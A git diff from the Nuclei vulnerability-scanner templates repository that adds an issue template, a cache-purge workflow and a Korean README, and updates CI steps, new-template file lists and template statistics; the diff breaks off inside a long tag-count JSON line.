diff --git a/.github/ISSUE_TEMPLATE/new-template.md b/.github/ISSUE_TEMPLATE/new-template.md
new file mode 100644
index 0000000000..428b440e80
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/new-template.md
@@ -0,0 +1,17 @@
+---
+name: Template Request
+about: 'request for new template to be created.'
+labels: 'new-template'
+
+---
+
+<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
+
+
+### Template for?
+
+<!-- Name the CVE / Vulnerability / Exploit / Misconfiguration / Technology -->
+
+### Details:
+
+<!-- Required information to create a nuclei template such as exploit link / source / reference / vulnerable setup / search query / demo host -->
\ No newline at end of file
diff --git a/.github/workflows/cache-purge.yml b/.github/workflows/cache-purge.yml
new file mode 100644
index 0000000000..0cdd8e99f5
--- /dev/null
+++ b/.github/workflows/cache-purge.yml
@@ -0,0 +1,18 @@
+name: 🗑️ Cache Purge
+
+on:
+  push:
+    tags:
+      - '*'
+  workflow_dispatch:
+
+jobs:
+  deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Purge cache
+        uses: jakejarvis/cloudflare-purge-action@master
+        env:
+          CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
+          CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
+#          PURGE_URLS: '["https://version-check.nuclei.sh/versions"]'
\ No newline at end of file
diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml
index 1253309751..9bc55c6447 100644
--- a/.github/workflows/cve-annotate.yml
+++ b/.github/workflows/cve-annotate.yml
@@ -29,7 +29,7 @@ jobs:
       - name: Generate CVE Annotations
         id: cve-annotate
         run: |
-          cve-annotate -i ./cves/ -d .
+          cve-annotate -i . -d .
           echo "::set-output name=changes::$(git status -s | wc -l)"
 
       - name: Commit files
diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml
index 4107c2edcc..bab829208b 100644
--- a/.github/workflows/template-validate.yml
+++ b/.github/workflows/template-validate.yml
@@ -25,5 +25,5 @@ jobs:
       - name: Template Validation
         run: |
           cp -r ${{ github.workspace }} $HOME
-          nuclei -validate -t .
+          nuclei -validate
           nuclei -validate -w ./workflows
\ No newline at end of file
diff --git a/.new-additions b/.new-additions
index 82aef81f32..1c8a13aa94 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,9 +1,35 @@
-cnvd/2020/CNVD-2020-46552.yaml
-cves/2021/CVE-2021-20123.yaml
-cves/2021/CVE-2021-20124.yaml
-cves/2021/CVE-2021-25075.yaml
-cves/2022/CVE-2022-30489.yaml
-misconfiguration/unauth-wavink-panel.yaml
-technologies/kubernetes-operational-view-detect.yaml
-vulnerabilities/wordpress/seo-redirection-xss.yaml
-workflows/yonyou-nc-workflow.yaml
+cnvd/2022/CNVD-2022-42853.yaml
+cves/2014/CVE-2014-8676.yaml
+cves/2015/CVE-2015-7245.yaml
+cves/2018/CVE-2018-16139.yaml
+cves/2020/CVE-2020-13258.yaml
+cves/2021/CVE-2021-35380.yaml
+cves/2021/CVE-2021-42663.yaml
+cves/2021/CVE-2021-42667.yaml
+cves/2022/CVE-2022-2376.yaml
+cves/2022/CVE-2022-23854.yaml
+cves/2022/CVE-2022-29004.yaml
+cves/2022/CVE-2022-29005.yaml
+cves/2022/CVE-2022-31474.yaml
+cves/2022/CVE-2022-35405.yaml
+cves/2022/CVE-2022-36642.yaml
+cves/2022/CVE-2022-37299.yaml
+cves/2022/CVE-2022-38794.yaml
+default-logins/3com/3com-nj2000-default-login.yaml
+exposed-panels/appsmith-web-login.yaml
+exposed-panels/ccm-detect.yaml
+exposed-panels/corebos-panel.yaml
+exposed-panels/cvent-panel-detect.yaml
+exposed-panels/omniampx-panel.yaml
+exposed-panels/v2924-admin-panel.yaml
+exposures/logs/redis-exception-error.yaml
+exposures/logs/webalizer-xtended-stats.yaml
+misconfiguration/aws-xray-application.yaml
+misconfiguration/corebos-htaccess.yaml
+misconfiguration/ec2-instance-information.yaml
+misconfiguration/graphql/graphql-playground.yaml
+misconfiguration/hivequeue-agent.yaml
+misconfiguration/server-status.yaml
+technologies/jhipster-detect.yaml
+technologies/openssl-detect.yaml
+vulnerabilities/videoxpert-lfi.yaml
diff --git a/.nuclei-ignore b/.nuclei-ignore
index 832ecac550..31dc7b597f 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -3,6 +3,11 @@
 #
 # This is default list of tags and files to excluded from default nuclei scan.
 # More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
+# 
+# ============ DO NOT EDIT ============
+# Automatically updated by nuclei on execution from nuclei-templates
+# User changes should be in nuclei config file
+# ============ DO NOT EDIT ============
 
 # tags is a list of tags to ignore execution for
 # unless asked for by the user.
diff --git a/README.md b/README.md
index 8026d4b3ab..751233d987 100644
--- a/README.md
+++ b/README.md
@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1156 | daffainfo     |   560 | cves             |  1160 | info     |  1192 | http    |  3187 |
-| panel     |   515 | dhiyaneshdk   |   421 | exposed-panels   |   523 | high     |   874 | file    |    68 |
-| lfi       |   461 | pikpikcu      |   316 | vulnerabilities  |   452 | medium   |   662 | network |    50 |
-| xss       |   367 | pdteam        |   262 | technologies     |   255 | critical |   414 | dns     |    17 |
-| wordpress |   364 | geeknik       |   179 | exposures        |   204 | low      |   183 |         |       |
-| exposure  |   293 | dwisiswant0   |   168 | misconfiguration |   197 | unknown  |     6 |         |       |
-| rce       |   291 | princechaddha |   133 | workflows        |   186 |          |       |         |       |
-| cve2021   |   283 | 0x_akoko      |   130 | token-spray      |   154 |          |       |         |       |
-| tech      |   271 | gy741         |   118 | default-logins   |    95 |          |       |         |       |
-| wp-plugin |   264 | pussycat0x    |   116 | file             |    68 |          |       |         |       |
+| cve       |  1430 | daffainfo     |   631 | cves             |  1407 | info     |  1474 | http    |  3858 |
+| panel     |   655 | dhiyaneshdk   |   584 | exposed-panels   |   662 | high     |  1009 | file    |    76 |
+| edb       |   563 | pikpikcu      |   329 | vulnerabilities  |   509 | medium   |   818 | network |    51 |
+| lfi       |   509 | pdteam        |   269 | technologies     |   282 | critical |   478 | dns     |    17 |
+| xss       |   491 | geeknik       |   187 | exposures        |   275 | low      |   225 |         |       |
+| wordpress |   419 | dwisiswant0   |   169 | misconfiguration |   237 | unknown  |    11 |         |       |
+| exposure  |   407 | 0x_akoko      |   165 | token-spray      |   230 |          |       |         |       |
+| cve2021   |   352 | princechaddha |   151 | workflows        |   189 |          |       |         |       |
+| rce       |   337 | ritikchaddha  |   137 | default-logins   |   103 |          |       |         |       |
+| wp-plugin |   316 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
 
-**261 directories, 3543 files**.
+**296 directories, 4231 files**.
 
 </td>
 </tr>
diff --git a/README_KR.md b/README_KR.md
new file mode 100644
index 0000000000..8bf4ba4257
--- /dev/null
+++ b/README_KR.md
@@ -0,0 +1,96 @@
+
+
+<h1 align="center">
+Nuclei 템플릿
+</h1>
+<h4 align="center">커뮤니티에서 엄선한, 애플리케이션 보안 취약점을 찾기 위한 Nuclei 엔진용 템플릿 목록</h4>
+
+
+<p align="center">
+<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
+<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
+<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
+<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
+</p>
+      
+<p align="center">
+  <a href="https://nuclei.projectdiscovery.io/templating-guide/">가이드 문서</a> •
+  <a href="#-contributions">기여</a> •
+  <a href="#-discussion">논의</a> •
+  <a href="#-community">커뮤니티</a> •
+  <a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
+  <a href="https://discord.gg/projectdiscovery">디스코드</a>
+</p>
+
+<p align="center">
+  <a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README.md">English</a> •
+  <a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_KR.md">한국어</a>
+</p>
+
+----
+
+템플릿은 실제 스캐닝 엔진을 동작하게 하는 [nuclei scanner](https://github.com/projectdiscovery/nuclei)의 핵심입니다.
+이 저장소는 우리 팀에서 제공하거나, 커뮤니티에서 기여한 다양한 템플릿들을 저장하고 보관합니다.
+템플릿 목록을 증가시키기 위해서 **pull requests** 나 [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) 를 통해 기여해주시기를 부탁드립니다.
+
+## Nuclei 템플릿 개요
+
+고유 태그, 작성자, 디렉토리, 심각도, 템플릿 종류에 대한 통계를 포함하고 있는 nuclei 템플릿의 개요입니다. 아래 표는 각 지표의 상위 10개 항목을 나타내고 있습니다. 더 자세한 정보는 [이곳](TEMPLATES-STATS.md)에서 확인 가능하고, [JSON](TEMPLATES-STATS.json) 형식으로도 확인 가능합니다. 
+
+<table>
+<tr>
+<td> 
+
+## Nuclei 템플릿 통계 Top 10
+
+|    태그    | 개수 |    작성자     | 개수 |    디렉토리     | 개수 | 심각도 | 개수 |  종류   | 개수 |
+|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
+| cve       |  1325 | daffainfo     |   629 | cves             |  1306 | info     |  1398 | http    |  3644 |
+| panel     |   604 | dhiyaneshdk   |   509 | exposed-panels   |   613 | high     |   955 | file    |    76 |
+| lfi       |   490 | pikpikcu      |   322 | vulnerabilities  |   506 | medium   |   784 | network |    50 |
+| xss       |   451 | pdteam        |   269 | technologies     |   273 | critical |   445 | dns     |    17 |
+| wordpress |   409 | geeknik       |   187 | exposures        |   254 | low      |   211 |         |       |
+| exposure  |   360 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
+| cve2021   |   324 | 0x_akoko      |   157 | misconfiguration |   210 |          |       |         |       |
+| rce       |   319 | princechaddha |   149 | workflows        |   187 |          |       |         |       |
+| wp-plugin |   304 | pussycat0x    |   130 | default-logins   |   102 |          |       |         |       |
+| tech      |   286 | gy741         |   126 | file             |    76 |          |       |         |       |
+
+**286개 디렉토리, 4012개 파일**.
+
+</td>
+</tr>
+</table>
+
+📖 문서
+-----
+
+새 템플릿이나 사용자 정의 템플릿을 빌드하기 위한 자세한 문서는 https://nuclei.projectdiscovery.io 에서 확인할 수 있습니다. 작업 방식의 이해를 돕기 위한 템플릿들도 있습니다.
+
+💪 기여
+-----
+
+Nuclei 템플릿은 커뮤니티의 기여로 동작합니다.
+[템플릿 기여](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [기능 요청](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+), [버그 제보](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)는 언제든지 환영합니다.
+
+![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
+
+💬 논의
+-----
+
+같이 이야기하고 싶은 질문, 의문 혹은 아이디어가 있으신가요?
+[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) 에서 자유롭게 시작할 수 있습니다.
+
+👨‍💻 커뮤니티
+-----
+
+프로젝트 관리자와 직접 논의하고 보안과 자동화 관련 사항을 다른 사람과 공유하기 위해 [Discord Community](https://discord.gg/projectdiscovery) 에 참여하는 것을 환영합니다. 추가로 Nuclei 에 대한 모든 정보를 업데이트 하기 위해 [트위터](https://twitter.com/pdnuclei) 팔로우를 할 수 있습니다.
+
+<p align="center">
+<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
+  <img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
+</a>
+</p>
+
+여러분의 기여와 커뮤니티의 활성화를 위한 노력에 다시한번 감사드립니다.
+:heart:
diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json
index 649fb65dc0..beae7d1561 100644
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
@@ -1 +1 @@
-{"tags":[{"name":"cve","count":1156},{"name":"panel","count":515},{"name":"lfi","count":461},{"name":"xss","count":367},{"name":"wordpress","count":364},{"name":"exposure","count":293},{"name":"rce","count":291},{"name":"cve2021","count":283},{"name":"tech","count":271},{"name":"wp-plugin","count":264},{"name":"cve2020","count":197},{"name":"","count":188},{"name":"token-spray","count":154},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":121},{"name":"apache","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"default-login","count":110},{"name":"unauth","count":108},{"name":"iot","count":102},{"name":"oast","count":97},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":71},{"name":"misconfig","count":65},{"name":"cve2017","count":64},{"name":"cve2022","count":63},{"name":"sqli","count":62},{"name":"ssrf","count":61},{"name":"file","count":60},{"name":"wp","count":55},{"name":"network","count":53},{"name":"router","count":52},{"name":"oracle","count":50},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"auth-bypass","count":39},{"name":"cve2014","count":37},{"name":"google","count":36},{"name":"cve2015","count":36},{"name":"cisco","count":35},{"name":"authenticated","count":35},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"listing","count":30},{"name":"jira","count":30},{"name":"injection","count":30},{"name":"traversal","count":29},{"name":"devops","count":28},{"name":"generic","count":26},{"name":"kubernetes","count":25},{"name":"adobe","count":24},{"name":"cms","count":24},{"name":"springboot","count":24},{"name":"oss","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"microsoft","count":21},{"name":"debug","count":21},{"name":"intrusive","count":21},{"name":"misc","count":21},{"name":"vmware","count":21},{"name":"aem","count":21},{"name":"wp-theme","count":20},{"name":"service","count":20},{"name":"fuzz","count":20},{"name":"manageengine","count":19},{"name":"cve2012","count":19},{"name":"dns","count":18},{"name":"zoho","count":18},{"name":"php","count":18},{"name":"tomcat","count":17},{"name":"aws","count":17},{"name":"deserialization","count":17},{"name":"weblogic","count":17},{"name":"struts","count":16},{"name":"ibm","count":16},{"name":"k8s","count":16},{"name":"cve2011","count":15},{"name":"dlink","count":15},{"name":"jenkins","count":15},{"name":"gitlab","count":15},{"name":"api","count":14},{"name":"java","count":14},{"name":"android","count":14},{"name":"cve2009","count":14},{"name":"fileupload","count":14},{"name":"hp","count":14},{"name":"xxe","count":14},{"name":"firewall","count":13},{"name":"camera","count":13},{"name":"ruijie","count":13},{"name":"status","count":12},{"name":"nginx","count":12},{"name":"rails","count":12},{"name":"printer","count":12},{"name":"netsweeper","count":12},{"name":"log4j","count":12},{"name":"cve2013","count":12},{"name":"lfr","count":12},{"name":"magento","count":11},{"name":"upload","count":11},{"name":"cnvd2021","count":11},{"name":"netgear","count":11},{"name":"graphql","count":11},{"name":"grafana","count":10},{"name":"coldfusion","count":10},{"name":"glpi","count":10},{"name":"fortigate","count":10},{"name":"dell","count":10},{"name":"backup","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"auth","count":10},{"name":"airflow","count":10},{"name":"woocommerce","count":9},{"name":"fastjson","count":9},{"name":"iis","count":9},{"name":"fortinet","count":9},{"name":"drupal","count":9},{"name":"zabbix","count":9},{"name":"mirai","count":9},{"name":"cve2008","count":9},{"name":"jndi","count":9},{"name":"ftp","count":9},{"name":"github","count":9},{"name":"windows","count":9},{"name":"webserver","count":9},{"name":"laravel","count":9},{"name":"wso2","count":9},{"name":"bypass","count":8},{"name":"audit","count":8},{"name":"metadata","count":8},{"name":"phpmyadmin","count":8},{"name":"vcenter","count":8},{"name":"confluence","count":8},{"name":"solr","count":8},{"name":"zyxel","count":8},{"name":"amazon","count":8},{"name":"citrix","count":8},{"name":"prometheus","count":8},{"name":"blind","count":8},{"name":"django","count":8},{"name":"azure","count":8},{"name":"scada","count":8},{"name":"firebase","count":7},{"name":"maps","count":7},{"name":"squirrelmail","count":7},{"name":"python","count":7},{"name":"rconfig","count":7},{"name":"elasticsearch","count":7},{"name":"kube","count":7},{"name":"sonicwall","count":7},{"name":"ssti","count":7},{"name":"mail","count":7},{"name":"exchange","count":7},{"name":"kafka","count":7},{"name":"files","count":7},{"name":"vpn","count":7},{"name":"bucket","count":7},{"name":"docker","count":6},{"name":"cobbler","count":6},{"name":"sitecore","count":6},{"name":"jetty","count":6},{"name":"fpd","count":6},{"name":"nodejs","count":6},{"name":"ofbiz","count":6},{"name":"druid","count":6},{"name":"dedecms","count":6},{"name":"crlf","count":6},{"name":"backdoor","count":6},{"name":"magmi","count":6},{"name":"jboss","count":6},{"name":"slack","count":6},{"name":"enum","count":6},{"name":"huawei","count":6},{"name":"headless","count":6},{"name":"zimbra","count":6},{"name":"lucee","count":6},{"name":"firmware","count":6},{"name":"bigip","count":6},{"name":"cicd","count":6},{"name":"go","count":6},{"name":"ecology","count":6},{"name":"cnvd2020","count":6},{"name":"setup","count":5},{"name":"cache","count":5},{"name":"kubelet","count":5},{"name":"thinkphp","count":5},{"name":"opensis","count":5},{"name":"artica","count":5},{"name":"circarlife","count":5},{"name":"symantec","count":5},{"name":"apisix","count":5},{"name":"moodle","count":5},{"name":"node","count":5},{"name":"gocd","count":5},{"name":"minio","count":5},{"name":"rseenet","count":5},{"name":"alibaba","count":5},{"name":"microweber","count":5},{"name":"error","count":5},{"name":"ssl","count":5},{"name":"rfi","count":5},{"name":"metinfo","count":5},{"name":"zhiyuan","count":5},{"name":"icewarp","count":5},{"name":"leak","count":5},{"name":"git","count":5},{"name":"strapi","count":5},{"name":"solarwinds","count":5},{"name":"keycloak","count":5},{"name":"fatpipe","count":5},{"name":"symfony","count":5},{"name":"ruby","count":5},{"name":"storage","count":5},{"name":"samsung","count":5},{"name":"photo","count":4},{"name":"cve2007","count":4},{"name":"oa","count":4},{"name":"terramaster","count":4},{"name":"ognl","count":4},{"name":"websphere","count":4},{"name":"buffalo","count":4},{"name":"nexus","count":4},{"name":"kevinlab","count":4},{"name":"sophos","count":4},{"name":"ssh","count":4},{"name":"resin","count":4},{"name":"cacti","count":4},{"name":"plesk","count":4},{"name":"elastic","count":4},{"name":"search","count":4},{"name":"jellyfin","count":4},{"name":"hongdian","count":4},{"name":"asp","count":4},{"name":"cloud","count":4},{"name":"hpe","count":4},{"name":"wcs","count":4},{"name":"paypal","count":4},{"name":"hoteldruid","count":4},{"name":"panos","count":4},{"name":"gogs","count":4},{"name":"cockpit","count":4},{"name":"aspose","count":4},{"name":"couchdb","count":4},{"name":"caucho","count":4},{"name":"tikiwiki","count":4},{"name":"artifactory","count":4},{"name":"flink","count":4},{"name":"mailchimp","count":4},{"name":"microstrategy","count":4},{"name":"sonarqube","count":4},{"name":"springcloud","count":4},{"name":"kibana","count":4},{"name":"prestashop","count":4},{"name":"hikvision","count":4},{"name":"thinkcmf","count":4},{"name":"db","count":4},{"name":"adminer","count":4},{"name":"voip","count":4},{"name":"activemq","count":4},{"name":"puppet","count":4},{"name":"smtp","count":4},{"name":"stripe","count":4},{"name":"awstats","count":4},{"name":"cnvd2019","count":4},{"name":"jetbrains","count":4},{"name":"beyondtrust","count":4},{"name":"npm","count":4},{"name":"xmlrpc","count":4},{"name":"mongodb","count":4},{"name":"sugarcrm","count":3},{"name":"voipmonitor","count":3},{"name":"kingsoft","count":3},{"name":"rlm","count":3},{"name":"synology","count":3},{"name":"httpbin","count":3},{"name":"seagate","count":3},{"name":"facebook","count":3},{"name":"lansweeper","count":3},{"name":"jeesns","count":3},{"name":"jfrog","count":3},{"name":"thinfinity","count":3},{"name":"openssh","count":3},{"name":"linkedin","count":3},{"name":"workspaceone","count":3},{"name":"javascript","count":3},{"name":"circleci","count":3},{"name":"smb","count":3},{"name":"axis","count":3},{"name":"ampps","count":3},{"name":"ebs","count":3},{"name":"sql","count":3},{"name":"umbraco","count":3},{"name":"log","count":3},{"name":"globalprotect","count":3},{"name":"empirecms","count":3},{"name":"telerik","count":3},{"name":"seeyon","count":3},{"name":"openbmcs","count":3},{"name":"postmessage","count":3},{"name":"oauth","count":3},{"name":"openam","count":3},{"name":"lotus","count":3},{"name":"zeroshell","count":3},{"name":"netlify","count":3},{"name":"square","count":3},{"name":"bruteforce","count":3},{"name":"linksys","count":3},{"name":"heroku","count":3},{"name":"concrete","count":3},{"name":"linkerd","count":3},{"name":"cloudflare","count":3},{"name":"samba","count":3},{"name":"bitrix","count":3},{"name":"horizon","count":3},{"name":"fortios","count":3},{"name":"modem","count":3},{"name":"aptus","count":3},{"name":"sharepoint","count":3},{"name":"consul","count":3},{"name":"3cx","count":3},{"name":"database","count":3},{"name":"jamf","count":3},{"name":"elfinder","count":3},{"name":"mcafee","count":3},{"name":"redis","count":3},{"name":"prtg","count":3},{"name":"glassfish","count":3},{"name":"movable","count":3},{"name":"kentico","count":3},{"name":"cisa","count":3},{"name":"ems","count":3},{"name":"messaging","count":3},{"name":"dos","count":3},{"name":"targa","count":3},{"name":"graph","count":3},{"name":"hashicorp","count":3},{"name":"vbulletin","count":3},{"name":"centos","count":3},{"name":"geowebserver","count":3},{"name":"phpinfo","count":3},{"name":"splunk","count":3},{"name":"phppgadmin","count":3},{"name":"mongo","count":3},{"name":"wordfence","count":3},{"name":"odoo","count":3},{"name":"axis2","count":3},{"name":"webadmin","count":3},{"name":"nacos","count":3},{"name":"httpd","count":3},{"name":"nosqli","count":3},{"name":"panabit","count":3},{"name":"subrion","count":3},{"name":"actuator","count":3},{"name":"vrealize","count":3},{"name":"epson","count":3},{"name":"dreambox","count":3},{"name":"pentaho","count":3},{"name":"trendnet","count":3},{"name":"openemr","count":3},{"name":"dolibarr","count":3},{"name":"sendgrid","count":3},{"name":"nuuo","count":3},{"name":"axigen","count":3},{"name":"fanruan","count":3},{"name":"grav","count":3},{"name":"exposures","count":3},{"name":"trixbox","count":3},{"name":"selea","count":3},{"name":"fuelcms","count":3},{"name":"saltstack","count":2},{"name":"akamai","count":2},{"name":"tenda","count":2},{"name":"horde","count":2},{"name":"code42","count":2},{"name":"favicon","count":2},{"name":"nasos","count":2},{"name":"netsus","count":2},{"name":"accela","count":2},{"name":"zerof","count":2},{"name":"exacqvision","count":2},{"name":"dotnetnuke","count":2},{"name":"rackstation","count":2},{"name":"craftcms","count":2},{"name":"zte","count":2},{"name":"fortimail","count":2},{"name":"frontpage","count":2},{"name":"pacsone","count":2},{"name":"nextcloud","count":2},{"name":"gitbook","count":2},{"name":"nagios","count":2},{"name":"mantisbt","count":2},{"name":"orchid","count":2},{"name":"javamelody","count":2},{"name":"alfresco","count":2},{"name":"emqx","count":2},{"name":"virtualui","count":2},{"name":"pfsense","count":2},{"name":"maian","count":2},{"name":"password","count":2},{"name":"ericsson","count":2},{"name":"resourcespace","count":2},{"name":"avaya","count":2},{"name":"webcam","count":2},{"name":"mysql","count":2},{"name":"mailgun","count":2},{"name":"dynamicweb","count":2},{"name":"text","count":2},{"name":"natshell","count":2},{"name":"rancher","count":2},{"name":"checkpoint","count":2},{"name":"bitly","count":2},{"name":"ilo","count":2},{"name":"labkey","count":2},{"name":"seowon","count":2},{"name":"harbor","count":2},{"name":"mida","count":2},{"name":"rocketchat","count":2},{"name":"waf","count":2},{"name":"influxdb","count":2},{"name":"dvwa","count":2},{"name":"pam","count":2},{"name":"servicenow","count":2},{"name":"jsf","count":2},{"name":"apollo","count":2},{"name":"sangfor","count":2},{"name":"redash","count":2},{"name":"guacamole","count":2},{"name":"idea","count":2},{"name":"bigant","count":2},{"name":"nextjs","count":2},{"name":"tidb","count":2},{"name":"openstack","count":2},{"name":"ansible","count":2},{"name":"dotcms","count":2},{"name":"sysaid","count":2},{"name":"metersphere","count":2},{"name":"aruba","count":2},{"name":"netdata","count":2},{"name":"jeedom","count":2},{"name":"supermicro","count":2},{"name":"ucmdb","count":2},{"name":"myfactory","count":2},{"name":"justwriting","count":2},{"name":"seeddms","count":2},{"name":"rackn","count":2},{"name":"thruk","count":2},{"name":"gradle","count":2},{"name":"lantronix","count":2},{"name":"neos","count":2},{"name":"domxss","count":2},{"name":"places","count":2},{"name":"casdoor","count":2},{"name":"key","count":2},{"name":"owasp","count":2},{"name":"cocoon","count":2},{"name":"chyrp","count":2},{"name":"couchbase","count":2},{"name":"tableau","count":2},{"name":"s3","count":2},{"name":"avantfax","count":2},{"name":"getsimple","count":2},{"name":"liferay","count":2},{"name":"csrf","count":2},{"name":"avtech","count":2},{"name":"netis","count":2},{"name":"phpstorm","count":2},{"name":"flightpath","count":2},{"name":"shellshock","count":2},{"name":"rosariosis","count":2},{"name":"typo3","count":2},{"name":"akkadian","count":2},{"name":"phpshowtime","count":2},{"name":"sequoiadb","count":2},{"name":"cloudinary","count":2},{"name":"pcoip","count":2},{"name":"wamp","count":2},{"name":"sentry","count":2},{"name":"octoprint","count":2},{"name":"appcms","count":2},{"name":"ruckus","count":2},{"name":"phpcollab","count":2},{"name":"pbootcms","count":2},{"name":"ixcache","count":2},{"name":"f5","count":2},{"name":"flir","count":2},{"name":"ranger","count":2},{"name":"erxes","count":2},{"name":"terraform","count":2},{"name":"viewpoint","count":2},{"name":"qihang","count":2},{"name":"middleware","count":2},{"name":"kiwitcms","count":2},{"name":"bigbluebutton","count":2},{"name":"cve2005","count":2},{"name":"webmin","count":2},{"name":"gitea","count":2},{"name":"globaldomains","count":2},{"name":"impresscms","count":2},{"name":"openwrt","count":2},{"name":"bomgar","count":2},{"name":"tongda","count":2},{"name":"weather","count":2},{"name":"wuzhicms","count":2},{"name":"yapi","count":2},{"name":"jquery","count":2},{"name":"apereo","count":2},{"name":"twitter","count":2},{"name":"alienvault","count":2},{"name":"detect","count":2},{"name":"proftpd","count":2},{"name":"totemomail","count":2},{"name":"listserv","count":2},{"name":"wooyun","count":2},{"name":"dubbo","count":2},{"name":"chiyu","count":2},{"name":"ovirt","count":2},{"name":"ebook","count":2},{"name":"gnuboard","count":2},{"name":"digitalrebar","count":2},{"name":"sqlite","count":2},{"name":"payara","count":2},{"name":"electron","count":2},{"name":"openfire","count":2},{"name":"tileserver","count":2},{"name":"cve2006","count":2},{"name":"xweb500","count":2},{"name":"node-red-dashboard","count":2},{"name":"swagger","count":2},{"name":"jmx","count":2},{"name":"commax","count":2},{"name":"hasura","count":2},{"name":"versa","count":2},{"name":"docs","count":2},{"name":"linux","count":2},{"name":"ambari","count":2},{"name":"pega","count":2},{"name":"graphite","count":2},{"name":"yii","count":2},{"name":"gophish","count":2},{"name":"metabase","count":2},{"name":"gespage","count":2},{"name":"kafdrop","count":2},{"name":"ametys","count":2},{"name":"glances","count":2},{"name":"hjtcloud","count":2},{"name":"lighttpd","count":2},{"name":"embed","count":2},{"name":"sidekiq","count":2},{"name":"intercom","count":2},{"name":"ec2","count":2},{"name":"livezilla","count":2},{"name":"auerswald","count":2},{"name":"codeigniter","count":2},{"name":"ghost","count":2},{"name":"ecoa","count":2},{"name":"traefik","count":2},{"name":"iptime","count":2},{"name":"rabbitmq","count":2},{"name":"emerge","count":2},{"name":"mbean","count":2},{"name":"cyberoam","count":2},{"name":"cas","count":2},{"name":"rockmongo","count":2},{"name":"pgadmin","count":2},{"name":"ad","count":2},{"name":"intellian","count":2},{"name":"forcepoint","count":2},{"name":"hadoop","count":2},{"name":"otobo","count":2},{"name":"xerox","count":2},{"name":"shenyu","count":2},{"name":"hubspot","count":2},{"name":"frp","count":2},{"name":"aviatrix","count":2},{"name":"netscaler","count":2},{"name":"openvpn","count":2},{"name":"acrolinx","count":2},{"name":"netflix","count":2},{"name":"igs","count":2},{"name":"mobileiron","count":2},{"name":"spark","count":2},{"name":"qcubed","count":2},{"name":"plastic","count":2},{"name":"matrix","count":2},{"name":"circontrol","count":2},{"name":"chamilo","count":2},{"name":"airtame","count":2},{"name":"rstudio","count":2},{"name":"itop","count":2},{"name":"conductor","count":2},{"name":"zzzcms","count":2},{"name":"xxljob","count":2},{"name":"arcgis","count":2},{"name":"azkaban","count":2},{"name":"tapestry","count":2},{"name":"hostheader-injection","count":2},{"name":"sdwan","count":2},{"name":"gitlist","count":2},{"name":"filemanager","count":2},{"name":"skycaiji","count":2},{"name":"projectsend","count":2},{"name":"clusterengine","count":2},{"name":"zblogphp","count":2},{"name":"backups","count":2},{"name":"seacms","count":2},{"name":"fortiweb","count":2},{"name":"pascom","count":2},{"name":"motorola","count":2},{"name":"bmc","count":2},{"name":"homematic","count":2},{"name":"cgi","count":2},{"name":"smartstore","count":2},{"name":"digitalocean","count":2},{"name":"jitsi","count":2},{"name":"konga","count":2},{"name":"ivanti","count":2},{"name":"showdoc","count":2},{"name":"hiveos","count":2},{"name":"watchguard","count":2},{"name":"syslog","count":2},{"name":"pulse","count":2},{"name":"idrac","count":2},{"name":"vidyo","count":2},{"name":"kong","count":2},{"name":"festivo","count":1},{"name":"mappress","count":1},{"name":"yishaadmin","count":1},{"name":"varnish","count":1},{"name":"sauter","count":1},{"name":"emlog","count":1},{"name":"hanwang","count":1},{"name":"kodi","count":1},{"name":"webpconverter","count":1},{"name":"slstudio","count":1},{"name":"timeclock","count":1},{"name":"rdp","count":1},{"name":"mantis","count":1},{"name":"fhem","coun